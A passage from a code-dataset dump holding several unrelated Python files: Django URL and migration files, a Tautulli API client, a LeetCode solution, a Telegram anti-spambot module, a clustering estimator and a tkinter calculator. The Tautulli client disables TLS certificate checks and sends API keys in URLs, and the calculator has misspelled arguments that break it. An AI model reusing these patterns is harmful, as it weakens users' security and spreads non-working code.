'location'),\nurl(r'^search/', views.search_results, name='search_results'),\nurl(r'^photo/(\\d+)',views.photo,name ='photo'), \nurl(r'^mode$',views.modal,name ='modal')\n\n]\n\n# if settings.DEBUG:\n# urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)","sub_path":"gallery/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"346235237","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n \"\"\"\n Creación de modelo Bedelia.\n \"\"\"\n\n dependencies = [\n ('app_reservas', '0011_redefinicion_archivo_ubicacion'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Bedelia',\n fields=[\n ('id', models.AutoField(auto_created=True,\n verbose_name='ID',\n primary_key=True,\n serialize=False)),\n ],\n options={\n 'verbose_name': 'Bedelía',\n 'verbose_name_plural': 'Bedelías',\n },\n ),\n migrations.AddField(\n model_name='bedelia',\n name='area',\n field=models.ForeignKey(to='app_reservas.Area'),\n ),\n migrations.AddField(\n model_name='bedelia',\n name='aulas',\n field=models.ManyToManyField(to='app_reservas.Aula'),\n ),\n migrations.AddField(\n model_name='bedelia',\n name='laboratorios_informatica',\n field=models.ManyToManyField(to='app_reservas.LaboratorioInformatico'),\n ),\n ]\n","sub_path":"app_reservas/migrations/0012_clase_bedelia.py","file_name":"0012_clase_bedelia.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"246815232","text":"\"\"\"\nA python module to get information from Tautulli.\n\nThis code is released under the terms of the MIT license. See the LICENSE\nfile for more details.\n\"\"\"\nimport requests\nimport urllib3\nurllib3.disable_warnings()\n\n\ndef get_users(host, port, api_key, schema='http'):\n \"\"\"Get the all users.\"\"\"\n cmd = 'get_users'\n url = \"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n api_key, cmd)\n users = []\n try:\n result = requests.get(url, timeout=8, verify=False).json()\n result = result['response']['data']\n for user_data in result:\n users.append(user_data['username'])\n except requests.exceptions.HTTPError:\n users.append('None')\n return users\n\n\ndef verify_user(host, port, api_key, username, schema='http'):\n \"\"\"Verify that a user exist.\"\"\"\n cmd = 'get_users'\n url = \"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n api_key, cmd)\n try:\n result = requests.get(url, timeout=8, verify=False).json()\n result = result['response']['data']\n for user_data in result:\n if user_data['username'].lower() == username.lower():\n user = True\n break\n else:\n user = False\n except requests.exceptions.HTTPError:\n user = False\n return user\n\n\ndef get_user_state(host, port, api_key, username, schema='http'):\n \"\"\"Get the state of a user.\"\"\"\n verify_user(host, port, api_key, username, schema)\n cmd = 'get_activity'\n url = \"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n api_key, cmd)\n user_state = 'not available'\n try:\n result = requests.get(url, timeout=8, verify=False).json()\n result = result['response']['data']['sessions']\n for sessions in result:\n if sessions['username'].lower() == username.lower():\n user_state = sessions['state']\n break\n except requests.exceptions.HTTPError:\n user_state = 'not available'\n return user_state\n\n\ndef get_user_activity(host, port, api_key, username, schema='http'):\n \"\"\"Get the last activity for the spesified user.\"\"\"\n verify_user(host, port, api_key, username, schema)\n cmd = 'get_activity'\n url = \"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n api_key, cmd)\n user_activity = default_activity_attributes()\n try:\n result = requests.get(url, timeout=8, verify=False).json()\n result = result['response']['data']['sessions']\n for sessions in result:\n if sessions['username'].lower() == username.lower():\n for key in sessions:\n user_activity[key] = sessions[key]\n user_activity = custom_activity(user_activity)\n break\n except requests.exceptions.HTTPError:\n user_activity = 'not available'\n return user_activity\n\n\ndef get_most_stats(host, port, api_key, schema='http'):\n \"\"\"Get the most * statistics.\"\"\"\n cmd = 'get_home_stats'\n url = \"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n api_key, cmd)\n home_stats = {}\n try:\n request = requests.get(url, timeout=8, verify=False).json()\n result = request['response']['data']\n except KeyError:\n home_stats.update(Status=\"not available\")\n if result:\n try:\n if result[0]['rows'][0]['title']:\n home_stats.update(Movie=result[0]['rows'][0]['title'])\n except IndexError:\n home_stats.update(Movie=\"None\")\n try:\n if result[3]['rows'][0]['title']:\n home_stats.update(TV=result[3]['rows'][0]['title'])\n except IndexError:\n home_stats.update(TV=\"None\")\n try:\n if result[7]['rows'][0]['user']:\n home_stats.update(User=result[7]['rows'][0]['user'])\n except IndexError:\n home_stats.update(User=\"None\")\n return home_stats\n\n\ndef get_server_stats(host, port, api_key, schema='http'):\n \"\"\"Get server statistics.\"\"\"\n cmd = 'get_activity'\n url = \"{}://{}:{}/api/v2?apikey={}&cmd={}\".format(schema, host, port,\n api_key, cmd)\n server_stats = {}\n try:\n request = requests.get(url, timeout=8, verify=False).json()\n result = request['response']['data']\n server_stats['count'] = result['stream_count']\n server_stats['total_bandwidth'] = result['total_bandwidth']\n server_stats['count_transcode'] = result['stream_count_transcode']\n server_stats['wan_bandwidth'] = result['wan_bandwidth']\n server_stats['direct_plays'] = result['stream_count_direct_play']\n server_stats['lan_bandwidth'] = result['lan_bandwidth']\n server_stats['direct_streams'] = result['stream_count_direct_stream']\n except requests.exceptions.HTTPError:\n server_stats = {}\n except requests.exceptions.SSLError:\n server_stats = {}\n return server_stats\n\n\ndef custom_activity(alist):\n \"\"\"Create additional activitie keys.\"\"\"\n if alist['media_type'] == 'episode':\n senum = ('S{0}'.format(alist['parent_media_index'].zfill(2)) +\n 'E{0}'.format(alist['media_index'].zfill(2)))\n alist['senum'] = senum\n alist['show_senum'] = alist['grandparent_title'] + ' ' + senum\n alist['s_senum_e'] = (alist['grandparent_title'] +\n ' ' + senum + ' ' + alist['title'])\n alist['magic_title'] = alist['s_senum_e']\n elif alist['media_type'] == 'movie':\n alist['magic_title'] = alist['full_title']\n return alist\n\n\ndef default_activity_attributes():\n \"\"\"Return default values for the activity_list.\"\"\"\n output = {}\n alist = ['_cache_time', 'actors', 'added_at', 'allow_guest', 'art',\n 'aspect_ratio', 'audience_rating', 'audio_bitrate',\n 'audio_bitrate_mode', 'audio_channel_layout', 'audio_channels',\n 'audio_codec', 'audio_decision', 'audio_language',\n 'audio_language_code', 'audio_profile', 'audio_sample_rate',\n 'bandwidth', 'banner', 'bif_thumb', 'bitrate', 'channel_stream',\n 'children_count', 'collections', 'container', 'content_rating',\n 'deleted_user', 'device', 'directors', 'do_notify', 'duration',\n 'email', 'file', 'file_size', 'full_title', 'genres',\n 'grandparent_rating_key', 'grandparent_thumb',\n 'grandparent_title', 'guid', 'height', 'id', 'indexes',\n 'ip_address', 'ip_address_public', 'is_admin', 'is_allow_sync',\n 'is_home_user', 'is_restricted', 'keep_history', 'labels',\n 'last_viewed_at', 'library_name', 'live', 'live_uuid', 'local',\n 'location', 'machine_id', 'media_index', 'media_type',\n 'optimized_version', 'optimized_version_profile',\n 'optimized_version_title', 'original_title',\n 'originally_available_at', 'parent_media_index',\n 'parent_rating_key', 'parent_thumb', 'parent_title', 'platform',\n 'platform_name', 'platform_version', 'player', 'product',\n 'product_version', 'profile', 'progress_percent',\n 'quality_profile', 'rating', 'rating_key', 'relay', 's_senum_e',\n 'section_id', 'senum', 'session_id', 'session_key',\n 'shared_libraries', 'show_senum', 'sort_title', 'state',\n 'stream_aspect_ratio', 'stream_audio_bitrate',\n 'stream_audio_bitrate_mode', 'stream_audio_channel_layout',\n 'stream_audio_channel_layout_', 'stream_audio_channels',\n 'stream_audio_codec', 'stream_audio_decision',\n 'stream_audio_language', 'stream_audio_language_code',\n 'stream_audio_sample_rate', 'stream_bitrate', 'stream_container',\n 'stream_container_decision', 'stream_duration',\n 'stream_subtitle_codec', 'stream_subtitle_container',\n 'stream_subtitle_decision', 'stream_subtitle_forced',\n 'stream_subtitle_format', 'stream_subtitle_language',\n 'stream_subtitle_language_code', 'stream_subtitle_location',\n 'stream_video_bit_depth', 'stream_video_bitrate',\n 'stream_video_codec', 'stream_video_codec_level',\n 'stream_video_decision', 'stream_video_framerate',\n 'stream_video_height', 'stream_video_language',\n 'stream_video_language_code', 'stream_video_ref_frames',\n 'stream_video_resolution', 'stream_video_width', 'studio',\n 'subtitle_codec', 'subtitle_container', 'subtitle_decision',\n 'subtitle_forced', 'subtitle_format', 'subtitle_language',\n 'subtitle_language_code', 'subtitle_location', 'subtitles',\n 'summary', 'synced_version', 'synced_version_profile', 'tagline',\n 'throttled', 'thumb', 'title', 'transcode_audio_channels',\n 'transcode_audio_codec', 'transcode_container',\n 'transcode_decision', 'transcode_height', 'transcode_hw_decode',\n 'transcode_hw_decode_title', 'transcode_hw_decoding',\n 'transcode_hw_encode', 'transcode_hw_encode_title',\n 'transcode_hw_encoding', 'transcode_hw_full_pipeline',\n 'transcode_hw_requested', 'transcode_key', 'transcode_progress',\n 'transcode_protocol', 'transcode_speed', 'transcode_throttled',\n 'transcode_video_codec', 'transcode_width', 'type', 'updated_at',\n 'user', 'user_id', 'user_rating', 'user_thumb', 'username',\n 'video_bit_depth', 'video_bitrate', 'video_codec',\n 'video_codec_level', 'video_decision', 'video_frame_rate',\n 'video_framerate', 'video_height', 'video_language',\n 'video_language_code', 'video_profile', 'video_ref_frames',\n 'video_resolution', 'video_width', 'view_offset', 'width',\n 'writers', 'year']\n for key in alist:\n output[key] = \"\"\n return output\n","sub_path":"pytautulli/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"262186885","text":"\n\n\"\"\"\n# Search Insert Position\n\nTotal Accepted: 73443 Total Submissions: 206644 Difficulty: Medium\n\n\nGiven a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.\n\nYou may assume no duplicates in the array.\n\nHere are few examples.\n`[1,3,5,6]`, 5 → 2\n`[1,3,5,6]`, 2 → 1\n`[1,3,5,6]`, 7 → 4\n`[1,3,5,6]`, 0 → 0\n\nShow Tags\n\n[Array](/tag/array/) [Binary Search](/tag/binary-search/)\n\nShow Similar Problems\n\n[ (E) First Bad Version](/problems/first-bad-version/)\n\n\n\"\"\"\n\n\n\n\n\nfrom pyshould import should\nfrom pylon import puts\n\n\nclass Solution(object):\n\n def searchInsert(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n if len(nums) == 0:\n return 0\n else:\n left, right = 0, len(nums)-1\n while left <= right:\n mid = (left + right) // 2\n if nums[mid] == target:\n return mid\n elif nums[mid] > target:\n right = mid - 1\n else:\n left = mid + 1\n return left\n\n\n\n\n\ndef test_search_insert():\n searchInsert = Solution().searchInsert\n searchInsert([], 5) | should.eq(0)\n searchInsert([5], 5) | should.eq(0)\n searchInsert([1, 2, 3], 2) | should.eq(1)\n searchInsert([1, 3, 5, 6], 5) | should.eq(2)\n searchInsert([1, 3, 5, 6], 2) | should.eq(1)\n searchInsert([1, 3, 5, 6], 7) | should.eq(4)\n searchInsert([1, 3, 5, 6], 0) | should.eq(0)\n\n\ntest_search_insert()\n\n\n\n","sub_path":"leetcode_solved/035_search_insert_position___medium.py","file_name":"035_search_insert_position___medium.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"633814578","text":"from django.conf.urls.defaults import url, patterns\nfrom cyder.cydhcp.vlan.views import VlanCreateView, vlan_detail\nfrom cyder.cydhcp.urls import cydhcp_urls\n\n\nurlpatterns = patterns(\n '',\n url(r'^create/$', VlanCreateView.as_view(),\n name='vlan-create'),\n url(r'^(?P[\\w-]+)/$', vlan_detail,\n name='vlan-detail'),\n) + cydhcp_urls('vlan')\n","sub_path":"cyder/cydhcp/vlan/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"178655363","text":"import telethon as tg\n\nimport command\nimport module\n\n\nclass AntibotModule(module.Module):\n name = \"Antibot\"\n\n suspicious_keywords = [\"investment\", \"profit\", \"binance\", \"binanse\", \"bitcoin\", \"testnet\", \"bitmex\"]\n\n suspicious_entities = [\n tg.types.MessageEntityUrl,\n tg.types.MessageEntityTextUrl,\n tg.types.MessageEntityEmail,\n tg.types.MessageEntityPhone,\n ]\n\n async def on_load(self):\n # Populate config if necessary\n if \"antibot\" not in self.bot.config:\n self.bot.config[\"antibot\"] = {\"threshold_time\": 30, \"group_ids\": []}\n else:\n if \"threshold_time\" not in self.bot.config[\"antibot\"]:\n self.bot.config[\"antibot\"][\"threshold_time\"] = 30 # seconds\n if \"group_ids\" not in self.bot.config[\"antibot\"]:\n self.bot.config[\"antibot\"][\"group_ids\"] = []\n\n def msg_has_suspicious_entity(self, msg):\n if not msg.entities:\n return False\n\n # Messages containing certain entities are more likely to be spam\n for entity in msg.entities:\n if entity.__class__ in self.__class__.suspicious_entities:\n return True\n\n return False\n\n def msg_has_suspicious_keyword(self, msg):\n if not msg.raw_text:\n return False\n\n # Many spam messages mention certain keywords, such as cryptocurrency exchanges\n l_text = msg.raw_text.lower()\n for kw in self.__class__.suspicious_keywords:\n if kw in l_text:\n return True\n\n return False\n\n def msg_content_suspicious(self, msg):\n # Consolidate message content checks\n return self.msg_has_suspicious_entity(msg) or self.msg_has_suspicious_keyword(msg)\n\n def msg_data_is_suspicious(self, msg):\n incoming = not msg.out\n has_date = msg.date\n forwarded = msg.forward\n\n # Message *could* be suspicious if we didn't send it\n # Check for a date to exonerate empty messages\n if incoming and has_date:\n # Lazily evalulate suspicious content as it is more expensive\n return forwarded or self.msg_content_suspicious(msg)\n\n return False\n\n async def msg_is_suspicious(self, msg):\n # Check if the data in the message is suspicious\n if not self.msg_data_is_suspicious(msg):\n return False\n\n # Load group-specific user information\n chat = await msg.get_chat()\n sender = await msg.get_sender()\n ch_participant = await self.bot.client(tg.tl.functions.channels.GetParticipantRequest(chat, sender))\n participant = ch_participant.participant\n\n # Exempt the group creator\n if isinstance(participant, tg.tl.types.ChannelParticipantCreator):\n return False\n\n delta = msg.date - participant.date\n if delta.total_seconds() <= self.bot.config[\"antibot\"][\"threshold_time\"]:\n # Suspicious message was sent shortly after joining\n return True\n\n # Allow this message\n return False\n\n async def take_action(self, msg):\n # Ban the sender\n chat = await msg.get_chat()\n sender = await msg.get_sender()\n rights = tg.tl.types.ChatBannedRights(until_date=None, view_messages=True)\n ban_request = tg.tl.functions.channels.EditBannedRequest(chat, sender, rights)\n await self.bot.client(ban_request)\n\n # Log the event\n self.log.info(f'Banned spambot with ID {sender.id} in group \"{chat.title}\"')\n await msg.reply(f\"❯❯ **Banned spambot** with ID `{sender.id}`\")\n self.bot.dispatch_event_nowait(\"stat_event\", \"spambots_banned\")\n\n # Delete the spam message\n await msg.delete()\n\n async def on_message(self, msg):\n enabled_in_chat = msg.is_group and msg.chat_id in self.bot.config[\"antibot\"][\"group_ids\"]\n\n if enabled_in_chat and await self.msg_is_suspicious(msg):\n # This is most likely a spambot, take action against the user\n await self.take_action(msg)\n\n @command.desc(\"Toggle the antibot auto-moderation feature in this group\")\n async def cmd_antibot(self, msg):\n if not msg.is_group:\n return \"__Antibot can only be used in groups.__\"\n\n gid_table = self.bot.config[\"antibot\"][\"group_ids\"]\n state = msg.chat_id in gid_table\n state = not state\n\n if state:\n gid_table.append(msg.chat_id)\n else:\n gid_table.remove(msg.chat_id)\n\n await self.bot.save_config()\n\n status = \"enabled\" if state else \"disabled\"\n return f\"Antibot is now **{status}** in this group.\"\n","sub_path":"modules/antibot.py","file_name":"antibot.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"432729518","text":"\"\"\"The Genie+ Clustering Algorithm\n\nCopyright (C) 2018-2019 Marek.Gagolewski.com\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. Neither the name of the copyright holder nor the names of its contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport numpy as np\nfrom . import internal\nfrom . import mst\nimport scipy.spatial.distance\nfrom sklearn.base import BaseEstimator, ClusterMixin\nimport sklearn.neighbors\nimport warnings\nimport math\n\n# @TODO: delme\nimport time\n\n#\ntry:\n import faiss\nexcept ImportError:\n pass\n\n\n\nclass Genie(BaseEstimator, ClusterMixin):\n \"\"\"The Genie+ Clustering Algorithm with optional smoothing and\n noise point detection (for M>1)\n\n Based on: Gagolewski M., Bartoszuk M., Cena A.,\n Genie: A new, fast, and outlier-resistant hierarchical clustering algorithm,\n Information Sciences 363, 2016, pp. 8-23. doi:10.1016/j.ins.2016.05.003\n\n A new hierarchical clustering linkage criterion: the Genie algorithm\n links two clusters in such a way that an inequity measure\n (namely, the Gini index) of the cluster sizes doesn't go far beyond\n some threshold. The introduced method most often outperforms\n the Ward or average linkage, k-means, spectral clustering,\n DBSCAN, Birch, and many others in terms of the clustering\n quality while - at the same time - it retains the speed of\n the single linkage algorithm.\n\n This is a new implementation of the Genie algorithm that requires\n O(n_samples*sqrt(n_samples))-time given a minimum spanning tree\n of the pairwise distance graph.\n The clustering can also be computed with respect to the\n mutual reachability distance (based, e.g., on the Euclidean metric),\n which is used in the definition of the HDBSCAN* algorithm, see\n R. Campello, D. Moulavi, A. Zimek, J. Sander, Hierarchical density\n estimates for data clustering, visualization, and outlier detection,\n ACM Transactions on Knowledge Discovery from Data 10(1):5:1–5:51, 2015.\n doi:10.1145/2733381.\n\n The Genie correction together with the smoothing factor M>2 (note that\n M==2 corresponds to the original distance) gives a robustified version of\n the HDBSCAN algorithm that is able to yield a predefined number of clusters,\n and hence not dependent on the original DBSCAN's somehow magical\n `eps` parameter or the HDBSCAN Python package's `min_cluster_size` one.\n\n\n Parameters\n ----------\n\n n_clusters : int, default=2\n Number of clusters to detect.\n gini_threshold : float in [0,1], default=0.3\n The threshold for the Genie correction, i.e.,\n the Gini index of the cluster size distribution.\n Threshold of 1.0 disables the correction.\n Low thresholds highly penalize the formation of small clusters.\n M : int, default=1\n Smoothing factor. M=1 gives the original Genie algorithm.\n n_neighbors : int, default=-1\n Number of nearest neighbors to compute for each data point.\n n_neighbors < 0 picks the default one, typically several dozen,\n but no less than M. Note that the algorithm's memory\n consumption is proportional to n_samples*n_neighbors.\n postprocess : str, one of \"boundary\" [default], \"none\", \"all\"\n Effective only if M>1. By default, only \"boundary\" points are merged\n with their nearest \"core\" points. To force a classical\n n_clusters-partition of a data set (with no notion of noise),\n choose \"all\".\n exact : bool, default=False\n If False, the minimum spanning tree shall be approximated\n based on the nearest neighbors graph. Finding nearest neighbors\n in low dimensional spaces is usually fast. Otherwise,\n the algorithm will need to inspect all pairwise distances,\n which gives the time complexity of O(n_samples*n_samples*n_features).\n allow_cast_float32 : bool, default=True\n Allow casting input data to float32 (for efficiency reasons, however,\n increases total memory usage). Note that some nearest neighbor search\n methods require float32 data anyway. This also normalizes\n the input coordinates so that the method is guaranteed to be translation\n and scale invariant.\n nn_params: dict, optional (default=None)\n Arguments to the sklearn.neighbors.NearestNeighbors class\n constructor, e.g., the metric to use (default='euclidean').\n\n\n Attributes\n ----------\n\n labels_ : ndarray, shape (n_samples,)\n Detected cluster labels for each point in the dataset given to fit():\n an integer vector c with c[i] denoting the cluster id\n (in {0, ..., n_clusters-1}) of the i-th object.\n If M>1, noise points are labeled -1.\n \"\"\"\n\n def __init__(self,\n n_clusters=2,\n gini_threshold=0.3,\n M=1,\n n_neighbors=-1,\n postprocess=\"boundary\",\n exact=True,\n allow_cast_float32=True,\n nn_params=None\n ):\n self.n_clusters = n_clusters\n self.gini_threshold = gini_threshold\n self.M = M\n self.n_neighbors = n_neighbors\n self.postprocess = postprocess\n self.exact = exact\n self.allow_cast_float32 = allow_cast_float32\n self.nn_params = nn_params\n\n self.labels_ = None\n # self.__last_state = dict()\n # self.__last_X\n # self.__last_mst\n # self.__last_nn_dist\n # self.__last_nn_ind\n\n\n def fit(self, X, y=None, cache=False):\n \"\"\"Perform clustering on X.\n The resulting partition shall be given by self.labels_.\n\n\n Parameters\n ----------\n\n X : ndarray, shape (n_samples, n_features)\n A matrix defining n_samples points in\n a n_features-dimensional vector space.\n y : None\n Ignored.\n cache : bool, default=True\n Store auxiliary results to speed up further calls\n to fit() on the same data matrix, but with different params.\n\n\n Returns\n -------\n\n self\n \"\"\"\n n = X.shape[0]\n #d = X.shape[0]\n\n if cache:\n raise NotImplementedError(\"cache not implemented yet\")\n\n\n cur_state = dict()\n\n if self.nn_params is None:\n cur_state[\"nn_params\"] = dict()\n else:\n cur_state[\"nn_params\"] = self.nn_params\n\n cur_state[\"metric\"] = cur_state[\"nn_params\"].get(\"metric\", \"euclidean\")\n cur_state[\"metric_params\"] = cur_state[\"nn_params\"].get(\"metric_params\", None)\n if cur_state[\"metric_params\"] is None:\n cur_state[\"metric_params\"] = dict()\n\n cur_state[\"n_clusters\"] = int(self.n_clusters)\n if cur_state[\"n_clusters\"] <= 1:\n raise ValueError(\"n_clusters must be > 1\")\n\n cur_state[\"gini_threshold\"] = float(self.gini_threshold)\n if not (0.0 <= cur_state[\"gini_threshold\"] <= 1.0):\n raise ValueError(\"gini_threshold not in [0,1]\")\n\n cur_state[\"M\"] = int(self.M)\n if not 1 <= cur_state[\"M\"] <= n:\n raise ValueError(\"M must be in [1, n_samples]\")\n\n cur_state[\"postprocess\"] = self.postprocess\n if cur_state[\"postprocess\"] not in (\"boundary\", \"none\", \"all\"):\n raise ValueError('postprocess should be one of (\"boundary\", \"none\", \"all\")')\n\n cur_state[\"n_neighbors\"] = int(self.n_neighbors)\n if 0 <= cur_state[\"n_neighbors\"] < max(1, cur_state[\"M\"]-1):\n raise ValueError(\"n_neighbors should be >= M-1\")\n\n cur_state[\"exact\"] = bool(self.exact)\n cur_state[\"allow_cast_float32\"] = bool(self.allow_cast_float32)\n\n if cur_state[\"allow_cast_float32\"]:\n X = X.astype(np.float32, order=\"C\", copy=False) # faiss supports float32 only # warning if sparse!!\n # center X + scale (NOT: standardize!)\n X = (X-X.mean(axis=0))/X.std(axis=None, ddof=1) # we don't want this for sparse X\n\n nn_dist = None\n nn_ind = None\n spanning_tree = None\n if not cur_state[\"exact\"]:\n #raise NotImplementedError(\"approximate method not implemented yet\")\n\n actual_n_neighbors = cur_state[\"n_neighbors\"]\n if actual_n_neighbors < 0:\n actual_n_neighbors = min(32, int(math.ceil(math.sqrt(n))))\n actual_n_neighbors = max(actual_n_neighbors, cur_state[\"M\"]-1)\n actual_n_neighbors = min(n-1, actual_n_neighbors)\n\n # t0 = time.time()\n #nn = sklearn.neighbors.NearestNeighbors(n_neighbors=actual_n_neighbors, **cur_state[\"nn_params\"])\n #nn_dist, nn_ind = nn.fit(X).kneighbors()\n # print(\"T=%.3f\" % (time.time()-t0), end=\"\\t\")\n\n # FAISS - `euclidean` and `cosine` only!\n\n\n\n\n nn = faiss.IndexFlatL2(X.shape[1])\n nn.add(X)\n nn_dist, nn_ind = nn.search(X, actual_n_neighbors+1)\n\n # @TODO:::::\n #nn_bad_where = np.where((nn_ind[:,0]!=np.arange(n)))[0]\n #print(nn_bad_where)\n #print(nn_ind[nn_bad_where,:5])\n #print(X[nn_bad_where,:])\n #assert nn_bad_where.shape[0] == 0\n\n nn_dist = nn_dist[:,1:].astype(X.dtype, order=\"C\")\n nn_ind = nn_ind[:,1:].astype(np.intp, order=\"C\")\n\n if cur_state[\"M\"] > 1:\n # d_core = nn_dist[:,cur_state[\"M\"]-2].astype(X.dtype, order=\"C\")\n raise NotImplementedError(\"approximate method not implemented yet\")\n\n # t0 = time.time()\n mst_dist, mst_ind = mst.mst_from_nn(nn_dist, nn_ind, stop_disconnected=True)\n # print(\"T=%.3f\" % (time.time()-t0), end=\"\\t\")\n\n else: # cur_state[\"exact\"]\n if cur_state[\"M\"] == 1:\n # the original Genie algorithm\n\n # 1. Use Prim's algorithm to determine the MST\n # w.r.t. the distances computed on the fly\n\n # t0 = time.time()\n\n mst_dist, mst_ind = mst.mst_from_distance(X,\n metric=cur_state[\"metric\"],\n metric_params=cur_state[\"metric_params\"])\n # print(\"T=%.3f\" % (time.time()-t0), end=\"\\t\")\n else:\n # Genie+HDBSCAN\n\n # 1. Use sklearn to determine d_core distance\n nn = sklearn.neighbors.NearestNeighbors(\n n_neighbors=cur_state[\"M\"]-1, **cur_state[\"nn_params\"])\n nn_dist, nn_ind = nn.fit(X).kneighbors()\n d_core = nn_dist[:,cur_state[\"M\"]-2].astype(nn_dist.dtype, order=\"C\")\n\n # 2. Use Prim's algorithm to determine the MST\n # w.r.t. the distances computed on the fly\n mst_dist, mst_ind = mst.mst_from_distance(X,\n metric=cur_state[\"metric\"],\n metric_params=dict(**cur_state[\"metric_params\"],\n d_core=d_core)\n )\n\n # apply the Genie+ algorithm\n labels = internal.genie_from_mst(mst_dist, mst_ind,\n n_clusters=cur_state[\"n_clusters\"],\n gini_threshold=cur_state[\"gini_threshold\"],\n noise_leaves=(cur_state[\"M\"]>1))\n\n # postprocess labels, if requested to do so\n if cur_state[\"M\"] == 1 or cur_state[\"postprocess\"] == \"none\":\n pass\n elif cur_state[\"postprocess\"] == \"boundary\":\n labels = internal.merge_boundary_points(mst_dist, mst_ind, labels, nn_ind, cur_state[\"M\"])\n elif cur_state[\"postprocess\"] == \"all\":\n labels = internal.merge_leaves_with_nearest_clusters(mst_dist, mst_ind, labels)\n\n self.labels_ = labels\n\n # # save state\n # self.__last_state = cur_state\n\n # self.__last_X = X\n # self.__last_mst = mst\n # self.__last_nn_dist = nn_dist\n # self.__last_nn_ind = nn_ind\n\n\n\n return self\n\n\n # not needed - inherited from ClusterMixin\n def fit_predict(self, X, y=None, cache=False):\n \"\"\"Compute a k-partition and return the predicted labels,\n see fit().\n\n\n Parameters\n ----------\n\n X : ndarray\n see fit()\n y : None\n see fit()\n cache : bool\n see fit()\n\n\n\n Returns\n -------\n\n labels_ : ndarray, shape (n_samples,)\n Predicted labels, representing a partition of X.\n labels_[i] gives the cluster id of the i-th input point.\n negative labels_ correspond to noise points.\n \"\"\"\n self.fit(X)\n return self.labels_\n\n\n # not needed - inherited from BaseEstimator\n # def __repr__(self):\n # \"\"\"\n # Return repr(self).\n # \"\"\"\n # return \"Genie(%s)\" % (\n # \", \".join([\"%s=%r\"%(k,v) for (k,v) in self.get_params().items()])\n # )\n\n #\n # def get_params(self, deep=False):\n # \"\"\"\n # Get the parameters for this estimator.\n #\n # Parameters:\n # -----------\n #\n # deep: bool\n # Ignored\n #\n # Returns:\n # --------\n #\n # params: dict\n # \"\"\"\n # return dict(\n # n_clusters = self.__n_clusters,\n # gini_threshold = self.__gini_threshold,\n # M = self.__M,\n # postprocess = self.__postprocess,\n # n_neighbors = self.__n_neighbors,\n # **self.__NearestNeighbors_params\n # )\n\n # not needed - inherited from BaseEstimator\n # def set_params(self, **params):\n # \"\"\"\n # Set the parameters for this estimator.\n #\n #\n # Parameters:\n # -----------\n #\n # params\n #\n #\n # Returns:\n # --------\n #\n # self\n # \"\"\"\n # ################## @TODO\n # return self\n","sub_path":"genieclust/genie.py","file_name":"genie.py","file_ext":"py","file_size_in_byte":15065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"165771119","text":"from tkinter import *\nclass calculator:\n def __init__(self):\n self.error=False\n window = Tk()\n #window.geometry(\"266*208\")\n window.configure(background='white')\n window.title(\"Calculator\")\n\n self.string = StringVar()\n entry = Entry(window, textVariable = self.string)\n entry.grid(row = 0, column = 0, columnnspan = 6)\n entry.focus()\n\n values = [\"7\", \"8\", \"9\", \"/\", \"Clear\", \"<-\", \"4\", \"5\", \"6\", \"*\", \"(\", \")\", \"1\", \"2\", \"3\", \"-\", \"=\", \"0\", \".\", \"%\", \"+\"]\n i=0\n row=1\n col=0\n for txt in values:\n padx=10;\n pady=10;\n if(i==6):\n row=2\n col=0\n if(i==12):\n row=3\n col=0\n if(i==17):\n row=4\n col=0\n if(txt==\"=\"):\n btn = Button(window, height = 2, width = 4, padx=23, pady=23, text=txt)\n btn.grid(row=row, column=col, 